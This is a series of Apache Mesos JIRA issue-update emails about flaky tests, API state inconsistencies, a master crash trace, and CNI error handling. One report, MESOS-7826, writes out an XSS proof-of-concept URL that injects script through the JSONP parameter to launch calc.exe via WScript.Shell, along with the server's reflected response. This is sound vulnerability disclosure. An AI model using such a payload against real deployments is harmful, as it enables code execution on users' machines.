(b) If the framework is partition aware, let it know that it's now > unreachable. > (2) If the agent re-connects: > (a) And the agent had restarted, let the non-checkpointing framework know > its tasks are GONE/LOST. > (b) If the agent still holds the tasks, the tasks are restored as reachable. 
> (3) If the agent gets removed: > (a) For partition aware non-checkpointing frameworks, let them know the > tasks are unreachable. > (b) For non partition aware non-checkpointing frameworks, let them know the > tasks are lost and kill them if the agent comes back. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-7887) `GET_EXECUTORS` and `/state` is not consistent between master and agent
[ https://issues.apache.org/jira/browse/MESOS-7887?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7887: -- Priority: Minor (was: Critical) > `GET_EXECUTORS` and `/state` is not consistent between master and agent > --- > > Key: MESOS-7887 > URL: https://issues.apache.org/jira/browse/MESOS-7887 > Project: Mesos > Issue Type: Improvement > Components: HTTP API, master >Affects Versions: 1.3.0, 1.5.0 >Reporter: Alexander Rojas >Priority: Minor > Labels: master, mesosphere, v1_api > > The master seem not to keep information about the executors since they are > not returned either either by getting the master state (with either v0 and v1 > API's) or with the call {{GET_EXECUTORS}}. Creating a cluster as follows: > {noformat} > ./bin/mesos-master.sh \ > --ip=${MASTER_IP} \ > --work_dir=/tmp/mesos/master \ > --log_dir=/tmp/mesos/master/log > {noformat} > {noformat} > sudo ./bin/mesos-agent.sh \ > --master=${MASTER_IP}:5050 \ > --work_dir=/tmp/mesos/agent \ > --log_dir=/tmp/mesos/agent/log \ > --containerizers=mesos,docker > {noformat} > And launch a couple of frameworks as follows: > {noformat} > ./src/mesos-execute \ > --master=${MASTER_IP}:5050 \ > > --task='{"name":"test-custom-command","task_id":{"value":"test-custom-command-task-1"},"agent_id":{"value":"50f4e551-aa5c-42db-8967-4dc3ee11658f-S0"},"resources":[{"name":"cpus","type":"SCALAR","scalar":{"value":1}},{"name":"mem","type":"SCALAR","scalar":{"value":32}},{"name":"disk","type":"SCALAR","scalar":{"value":32}}],"executor":{"executor_id":{"value":"test-custom-command-executor"},"command":{"value":"while > true; do echo \"Hello World\"; sleep 5; done;"}}}' > {noformat} > {noformat} > ./src/mesos-execute \ > --master=${MASTER_IP}:5050 \ > --name=test-command \ > --command='while true; do echo "Hello World"; sleep 5; done;' \ > --containerizer=docker \ > --docker_image=ubuntu:latest > {noformat} > Not using the operator endpoints on the agent: > {noformat} > $ http POST 
${AGENT_IP}:5051/api/v1 type=GET_EXECUTORS > { > "get_executors": { > "completed_executors": [ > ], > "executors": [ > { > "executor_info": { > "command": { > "arguments": [ > "mesos-executor", > "--launcher_dir=/workspace/mesos/build/src" > ], > "shell": false, > "value": "/workspace/mesos/build/src/mesos-executor" > }, > "container": { > "docker": { > "image": "ubuntu:latest", > "network": "HOST", > "privileged": false > }, > "type": "DOCKER" > }, > "executor_id": { > "value": "test-command" > }, > "framework_id": { > "value": "87577bcd-093d-4240-a24b-107b4d1d21bd-0001" > }, > "name": "Command Executor (Task: test-command) (Command: sh -c > 'while true; ...')", > "resources": [ > { > "allocation_info": { > "role": "*" > }, > "name": "cpus", > "scalar": { > "value": 0.1 > }, > "type": "SCALAR" > }, > { > "allocation_info": { > "role": "*" > }, > "name": "mem", > "scalar": { > "value": 32 > }, > "type": "SCALAR" > } > ], > "source": "test-command" > } > }, > { > "executor_info": { > "command": { > "shell": true, > "value": "while true; do echo \"Hello World\"; sleep 5; done;" > }, > "executor_id": { > "value": "test-custom-command-executor" > }, > "framework_id": { > "value": "87577bcd-093d-4240-a24b-107b4d1d21bd-" > } > } > } > ] > }, > "type": "GET_EXECUTORS" > } > {noformat} > While the master does > {noformat} > http POST ${MASTER_IP}:5050/api/v1 type=GET_EXECUTORS > { > "get_executors": {}, > "type": "GET_EXECUTORS" > } > {noformat} > These results are consistent using the `/state` endpoint on both, agent and > master as well as using the {{GET_STATE}} v1 API call. The agent returns > information about executors, while the master response has none. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-7991) fatal, check failed !framework->recovered()
[ https://issues.apache.org/jira/browse/MESOS-7991?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7991: -- Sprint: Mesosphere Sprint 66, Mesosphere Sprint 67, Mesosphere Sprint 68, Mesosphere Sprint 74 (was: Mesosphere Sprint 66, Mesosphere Sprint 67, Mesosphere Sprint 68) > fatal, check failed !framework->recovered() > --- > > Key: MESOS-7991 > URL: https://issues.apache.org/jira/browse/MESOS-7991 > Project: Mesos > Issue Type: Bug >Reporter: Jack Crawford >Assignee: Alexander Rukletsov >Priority: Critical > Labels: reliability > > mesos master crashed on what appears to be framework recovery > mesos master version: 1.3.1 > mesos agent version: 1.3.1 > {code} > W0920 14:58:54.756364 25452 master.cpp:7568] Task > 862181ec-dffb-4c03-8807-5fb4c4e9a907 of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756369 25452 master.cpp:7568] Task > 9c21c48a-63ad-4d58-9e22-f720af19a644 of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756376 25452 master.cpp:7568] Task > 05c451f8-c48a-47bd-a235-0ceb9b3f8d0c of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756381 25452 master.cpp:7568] Task > e8641b1f-f67f-42fe-821c-09e5a290fc60 of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756386 25452 
master.cpp:7568] Task > f838a03c-5cd4-47eb-8606-69b004d89808 of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756392 25452 master.cpp:7568] Task > 685ca5da-fa24-494d-a806-06e03bbf00bd of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756397 25452 master.cpp:7568] Task > 65ccf39b-5c46-4121-9fdd-21570e8068e6 of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > F0920 14:58:54.756404 25452 master.cpp:7601] Check failed: > !framework->recovered() > *** Check failure stack trace: *** > @ 0x7f7bf80087ed google::LogMessage::Fail() > @ 0x7f7bf800a5a0 google::LogMessage::SendToLog() > @ 0x7f7bf80083d3 google::LogMessage::Flush() > @ 0x7f7bf800afc9 google::LogMessageFatal::~LogMessageFatal() > @ 0x7f7bf736fe7e > mesos::internal::master::Master::reconcileKnownSlave() > @ 0x7f7bf739e612 mesos::internal::master::Master::_reregisterSlave() > @ 0x7f7bf73a580e > _ZNSt17_Function_handlerIFvPN7process11ProcessBaseEEZNS0_8dispatchIN5mesos8internal6master6MasterERKNS5_9SlaveInfoERKNS0_4UPIDERK6OptionINSt7__cxx1112basic_stringIcSt11char_traitsIcESaIc > RKSt6vectorINS5_8ResourceESaISQ_EERKSP_INS5_12ExecutorInfoESaISV_EERKSP_INS5_4TaskESaIS10_EERKSP_INS5_13FrameworkInfoESaIS15_EERKSP_INS6_17Archive_FrameworkESaIS1A_EERKSL_RKSP_INS5_20SlaveInfo_CapabilityESaIS > 
1H_EERKNS0_6FutureIbEES9_SC_SM_SS_SX_S12_S17_S1C_SL_S1J_S1N_EEvRKNS0_3PIDIT_EEMS1R_FvT0_T1_T2_T3_T4_T5_T6_T7_T8_T9_T10_ET11_T12_T13_T14_T15_T16_T17_T18_T19_T20_T21_EUlS2_E_E9_M_invokeERKSt9_Any_dataOS2_ > @ 0x7f7bf7f5e69c process::ProcessBase::visit() > @ 0x7f7bf7f71403 process::ProcessManager::resume() > @ 0x7f7bf7f7c127 > _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUt_vEEE6_M_runEv > @ 0x7f7bf60b5c80 (unknown) > @ 0x7f7bf58c86ba start_thread > @ 0x7f7bf55fe3dd (unknown) > mesos-master.service: Main process exited, code=killed, status=6/ABRT > mesos-master.service: Unit entered failed state. > mesos-master.service: Failed with result 'signal'. > {code} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-5918) Replace jsonp with a more secure alternative
[ https://issues.apache.org/jira/browse/MESOS-5918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-5918: -- Labels: security (was: ) > Replace jsonp with a more secure alternative > > > Key: MESOS-5918 > URL: https://issues.apache.org/jira/browse/MESOS-5918 > Project: Mesos > Issue Type: Improvement > Components: json api, webui >Reporter: Yan Xu >Priority: Major > Labels: security > > We currently use the {{jsonp}} technique to bypass CORS check. This practice > has many security concerns (see discussions on MESOS-5911) so we should > replace it with a better alternative. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-5918) Replace jsonp with a more secure alternative
[ https://issues.apache.org/jira/browse/MESOS-5918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-5918: -- Component/s: json api > Replace jsonp with a more secure alternative > > > Key: MESOS-5918 > URL: https://issues.apache.org/jira/browse/MESOS-5918 > Project: Mesos > Issue Type: Improvement > Components: json api, webui >Reporter: Yan Xu >Priority: Major > Labels: security > > We currently use the {{jsonp}} technique to bypass CORS check. This practice > has many security concerns (see discussions on MESOS-5911) so we should > replace it with a better alternative. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-7826) XSS in JSONP parameter
[ https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7826: -- Labels: security (was: ) > XSS in JSONP parameter > -- > > Key: MESOS-7826 > URL: https://issues.apache.org/jira/browse/MESOS-7826 > Project: Mesos > Issue Type: Improvement > Components: json api > Environment: Running as part of DC/OS in a docker container. >Reporter: Vincent Ruijter >Priority: Critical > Labels: security > > It is possible to inject arbitrary content into a server request. Take into > account the following url: > https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b > This will result in the following request: > {code:html} > GET > /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b > HTTP/1.1 > Host: xxx.xxx.com > User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 > Firefox/54.0 > Accept: */* > Accept-Language: en-US,en;q=0.5 > [...SNIP...] > {code} > The server response: > {code:html} > HTTP/1.1 200 OK > Server: openresty/1.9.15.1 > Date: Tue, 25 Jul 2017 09:04:31 GMT > Content-Type: text/javascript > Content-Length: 1411637 > Connection: close > var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", > 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01 > 19:16:40","build_time":149634 > [...SNIP...] > {code} > On Internet Explorer this will trigger a file download, and when executing > the file (state.js), it will pop-up a calculator. It's my recommendation to > apply input validation on this parameter, to prevent abuse. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-6551) Add attach/exec commands to the Mesos CLI
[ https://issues.apache.org/jira/browse/MESOS-6551?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-6551: -- Priority: Major (was: Critical) > Add attach/exec commands to the Mesos CLI > - > > Key: MESOS-6551 > URL: https://issues.apache.org/jira/browse/MESOS-6551 > Project: Mesos > Issue Type: Task > Components: cli >Reporter: Kevin Klues >Assignee: Armand Grillet >Priority: Major > Labels: debugging, mesosphere > > After all of this support has landed, we need to update the Mesos CLI to > implement {{attach}} and {{exec}} functionality as outlined in the Design Doc -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-8471) Allow revocable_resources capability for mesos-execute
[ https://issues.apache.org/jira/browse/MESOS-8471?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336149#comment-16336149 ] Zhitao Li commented on MESOS-8471: -- A quick attempt is at https://reviews.apache.org/r/65294/ > Allow revocable_resources capability for mesos-execute > -- > > Key: MESOS-8471 > URL: https://issues.apache.org/jira/browse/MESOS-8471 > Project: Mesos > Issue Type: Improvement > Components: cli >Reporter: Zhitao Li >Priority: Minor > > While mesos-execute is a nice tool to quickly test certain behavior of Mesos > itself without an external framework, there is no direct way to > test revocable support in it. > A quick test with the binary suggests that if we infer the *REVOCABLE_RESOURCES* > capability from the input, tasks or task groups using revocable resources > could be launched through mesos-execute. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-7506) Multiple tests leave orphan containers.
[ https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336134#comment-16336134 ] Andrei Budnik commented on MESOS-7506: -- Steps to reproduce `LinuxCapabilitiesIsolatorFlagsTest.ROOT_IsolatorFlags`: # Add {{::sleep(1);}} before [removing|https://github.com/apache/mesos/blob/e91ce42ed56c5ab65220fbba740a8a50c7f835ae/src/linux/cgroups.cpp#L483] the "test" cgroup # recompile # run `sudo GLOG_v=2 ./src/mesos-tests --gtest_filter=LinuxCapabilitiesIsolatorFlagsTest.ROOT_IsolatorFlags --gtest_break_on_failure --gtest_repeat=10 --verbose` > Multiple tests leave orphan containers. > --- > > Key: MESOS-7506 > URL: https://issues.apache.org/jira/browse/MESOS-7506 > Project: Mesos > Issue Type: Bug > Components: containerization > Environment: Ubuntu 16.04 > Fedora 23 > other Linux distros >Reporter: Alexander Rukletsov >Assignee: Andrei Budnik >Priority: Major > Labels: containerizer, flaky-test, mesosphere > Attachments: KillMultipleTasks-badrun.txt, > ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, > ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, > ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, > RestartSlaveRequireExecutorAuthentication-badrun.txt, > TaskWithFileURI-badrun.txt > > > I've observed a number of flaky tests that leave orphan containers upon > cleanup. A typical log looks like this: > {noformat} > ../../src/tests/cluster.cpp:580: Failure > Value of: containers->empty() > Actual: false > Expected: true > Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 } > {noformat} > All currently affected tests: > {noformat} > SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any > more > ROOT_IsolatorFlags > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
[ https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16335940#comment-16335940 ] Benjamin Bannier commented on MESOS-8474: - This failed again with a different error, {noformat} ../../src/tests/storage_local_resource_provider_tests.cpp:1877 block is NONE {noformat} I attached [the full test log|https://issues.apache.org/jira/secure/attachment/12907300/consoleText.txt]. > Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky > > > Key: MESOS-8474 > URL: https://issues.apache.org/jira/browse/MESOS-8474 > Project: Mesos > Issue Type: Bug > Components: storage, test >Affects Versions: 1.5.0 >Reporter: Benjamin Bannier >Assignee: Chun-Hung Hsiao >Priority: Major > Labels: flaky, flaky-test, mesosphere > Attachments: consoleText.txt, consoleText.txt > > > Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled, > {noformat} > ../../src/tests/storage_local_resource_provider_tests.cpp:1898 > Expected: 2u > Which is: 2 > To be equal to: destroyed.size() > Which is: 1 > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
[ https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Bannier updated MESOS-8474: Attachment: consoleText.txt > Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky > > > Key: MESOS-8474 > URL: https://issues.apache.org/jira/browse/MESOS-8474 > Project: Mesos > Issue Type: Bug > Components: storage, test >Affects Versions: 1.5.0 >Reporter: Benjamin Bannier >Assignee: Chun-Hung Hsiao >Priority: Major > Labels: flaky, flaky-test, mesosphere > Attachments: consoleText.txt, consoleText.txt > > > Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled, > {noformat} > ../../src/tests/storage_local_resource_provider_tests.cpp:1898 > Expected: 2u > Which is: 2 > To be equal to: destroyed.size() > Which is: 1 > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky
[ https://issues.apache.org/jira/browse/MESOS-8478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Bannier updated MESOS-8478: Labels: flaky flaky-test mesosphere (was: ) > Test MasterTestPrePostReservationRefinement.LaunchTask is flaky > --- > > Key: MESOS-8478 > URL: https://issues.apache.org/jira/browse/MESOS-8478 > Project: Mesos > Issue Type: Bug > Components: master, test >Affects Versions: 1.6.0 >Reporter: Benjamin Bannier >Priority: Major > Labels: flaky, flaky-test, mesosphere > Attachments: consoleText.txt > > > Observed on our internal CI on a plain cmake build on ubuntu-16.04 at > {{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}}, > {noformat} > /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269 > Mock function called more times than expected - returning default value. > Function call: authorized(@0x7fe1108c61e0 48-byte object E1-7F 00-00 00-00 00-00 00-00 00-00 07-00 00-00 00-00 00-00 D0-5F 05-E8 E0-7F > 00-00 C0-E9 03-E8 E0-7F 00-00 02-00 00-00 E1-7F 00-00>) > Returns: Abandoned > Expected: to be called once >Actual: called twice - over-saturated and active > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky
[ https://issues.apache.org/jira/browse/MESOS-8478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Bannier updated MESOS-8478: Attachment: consoleText.txt > Test MasterTestPrePostReservationRefinement.LaunchTask is flaky > --- > > Key: MESOS-8478 > URL: https://issues.apache.org/jira/browse/MESOS-8478 > Project: Mesos > Issue Type: Bug > Components: master, test >Affects Versions: 1.6.0 >Reporter: Benjamin Bannier >Priority: Major > Attachments: consoleText.txt > > > Observed on our internal CI on a plain cmake build on ubuntu-16.04 at > {{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}}, > {noformat} > /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269 > Mock function called more times than expected - returning default value. > Function call: authorized(@0x7fe1108c61e0 48-byte object E1-7F 00-00 00-00 00-00 00-00 00-00 07-00 00-00 00-00 00-00 D0-5F 05-E8 E0-7F > 00-00 C0-E9 03-E8 E0-7F 00-00 02-00 00-00 E1-7F 00-00>) > Returns: Abandoned > Expected: to be called once >Actual: called twice - over-saturated and active > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Created] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky
Benjamin Bannier created MESOS-8478: --- Summary: Test MasterTestPrePostReservationRefinement.LaunchTask is flaky Key: MESOS-8478 URL: https://issues.apache.org/jira/browse/MESOS-8478 Project: Mesos Issue Type: Bug Components: master, test Affects Versions: 1.6.0 Reporter: Benjamin Bannier Observed on our internal CI on a plain cmake build on ubuntu-16.04 at {{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}}, {noformat} /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269 Mock function called more times than expected - returning default value. Function call: authorized(@0x7fe1108c61e0 48-byte object ) Returns: Abandoned Expected: to be called once Actual: called twice - over-saturated and active {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-6822) CNI reports confusing error message for failed interface setup.
[ https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16335568#comment-16335568 ] Qian Zhang commented on MESOS-6822: --- The way we check the return value of {{os::spawn}} is not correct: we return {{os::strerror(errno)}} whenever {{os::spawn}} returns non-zero. However, looking at the implementation of {{os::spawn}}, it calls {{waitpid}} on the child process and returns the child's exit status. So when the child process exits with a non-zero status (e.g., 127 if the command to be executed cannot be found), we still return {{os::strerror(errno)}}, which reads "Success" because {{waitpid}} itself succeeded and {{errno}} was never set. We should handle the return value of {{os::spawn}} the way the code below does. https://github.com/apache/mesos/blob/1.4.1/src/linux/fs.cpp#L481:L497 > CNI reports confusing error message for failed interface setup. > --- > > Key: MESOS-6822 > URL: https://issues.apache.org/jira/browse/MESOS-6822 > Project: Mesos > Issue Type: Bug > Components: network >Affects Versions: 1.1.0 >Reporter: Alexander Rukletsov >Assignee: Qian Zhang >Priority: Major > > Saw this today: > {noformat} > Failed to bring up the loopback interface in the new network namespace of pid > 17067: Success > {noformat} > which is produced by this code: > https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859 > Note that ssh'ing into the machine confirmed that {{ifconfig}} is available > in {{PATH}}. > Full log: http://pastebin.com/hVdNz6yk -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-6822) CNI reports confusing error message for failed interface setup.
[ https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Qian Zhang updated MESOS-6822: -- Shepherd: Jie Yu Story Points: 2 Sprint: Mesosphere Sprint 73 Target Version/s: 1.6.0 > CNI reports confusing error message for failed interface setup. > --- > > Key: MESOS-6822 > URL: https://issues.apache.org/jira/browse/MESOS-6822 > Project: Mesos > Issue Type: Bug > Components: network >Affects Versions: 1.1.0 >Reporter: Alexander Rukletsov >Assignee: Qian Zhang >Priority: Major > > Saw this today: > {noformat} > Failed to bring up the loopback interface in the new network namespace of pid > 17067: Success > {noformat} > which is produced by this code: > https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859 > Note that ssh'ing into the machine confirmed that {{ifconfig}} is available > in {{PATH}}. > Full log: http://pastebin.com/hVdNz6yk -- This message was sent by Atlassian JIRA (v7.6.3#76005)